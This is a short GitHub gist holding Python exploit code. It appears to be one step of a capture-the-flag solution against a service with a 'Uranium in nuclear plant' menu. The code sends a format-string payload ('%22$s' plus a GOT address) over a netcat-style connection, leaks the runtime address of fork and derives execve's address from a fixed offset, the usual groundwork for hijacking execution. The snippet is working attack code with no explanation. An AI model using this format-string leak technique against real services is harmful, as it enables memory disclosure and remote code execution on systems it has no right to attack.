/gist:5305882
Last active Dec 15, 2015
| # Step 1c--- Get the address of execve | |
| LEAKFORKADDR = dword_to_bitstring(location_got_fork) | |
| LEAKFORKADDR += "%22$s:ENFORK:" | |
| nc.read_until("Your choice: ") | |
| nc.write("1" + "\n") | |
| nc.read_until("Insert name: ") | |
| nc.write(LEAKFORKADDR+"A"*(100-len(LEAKFORKADDR))+"\x01\x01"*4+"\xFF\xFF"+"\n") | |
| nc.read_until("Uranium in nuclear plant \"") | |
| addrfork = bitstring_to_dword(nc.read_until(":ENFORK:")[4:-8]) | |
| addrexecve = addrfork + 0x320 | |
| print "[+] Address of fork :", hex(addrfork) | |
| print " > Address of execve :", hex(addrexecve) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment